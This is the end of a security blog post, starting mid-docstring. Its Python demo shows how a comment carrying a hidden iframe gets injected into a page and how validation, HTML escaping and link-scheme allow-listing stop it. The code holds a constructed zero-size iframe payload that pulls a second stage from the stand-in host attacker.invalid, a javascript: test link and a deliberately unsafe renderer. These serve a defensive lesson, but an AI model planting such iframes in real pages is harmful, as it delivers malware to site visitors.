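The post text, the frame source and the helper names are constructed for
this example; they are not from Finjan's reports or the sites named above.
"""
import html
import re
from urllib.parse import urlsplit

# Constructed payload of the kind the reports describe: a zero-size frame
# that pulls a second-stage page from somewhere else.
MALICIOUS_POST = ('Nice photos! <iframe src="http://attacker.invalid/stage2" '
                  'width="0" height="0"></iframe>')

MAX_POST_LEN = 2000                                      # assumed policy limit
CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f]")  # tab/newline/CR allowed


def render_unsafe(post):
    """The Web 2.0 mistake: user text concatenated into the page as markup."""
    return f"<div class='post'>{post}</div>"


def validate_post(post):
    """Input validation: reject what a comment should never contain; keep the rest."""
    if not isinstance(post, str) or not post.strip():
        raise ValueError("empty post")
    if len(post) > MAX_POST_LEN:
        raise ValueError("post too long")
    if CONTROL_CHARS.search(post):
        raise ValueError("control characters in post")
    return post


def render_safe(post):
    """Output encoding: every user character becomes literal text in the HTML."""
    return f"<div class='post'>{html.escape(validate_post(post), quote=True)}</div>"


def safe_href(url):
    """Allow-list the scheme of a user-supplied link; anything else is dropped."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return None
    return html.escape(url.strip(), quote=True)


def contains_active_content(rendered):
    """Demo check: does the rendered output still carry a tag that loads or runs code?"""
    return re.search(r"<\s*(iframe|script|object|embed)\b", rendered, re.I) is not None


if __name__ == "__main__":
    print("unsafe:", render_unsafe(MALICIOUS_POST))
    print("safe:  ", render_safe(MALICIOUS_POST))
    print("link:  ", safe_href("javascript:alert(1)"), safe_href("https://example.com/"))
```

Validation rejects what no comment legitimately needs (control bytes, absurd length); encoding handles everything else, so the page never has to guess which fragments of user text are “really” markup. That is what makes the approach hold up after an inspection signature is evaded.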

How does your organization approach this issue?

— References —
“Cyber Sino-Japanese War?” MCRC Blog, Feb 26, 2009 http://www.finjan.com/MCRCblog.aspx?EntryId=2197
“Malware and the rising sun website” MCRC Blog, Feb 24, 2009 http://www.finjan.com/MCRCblog.aspx?EntryId=2195
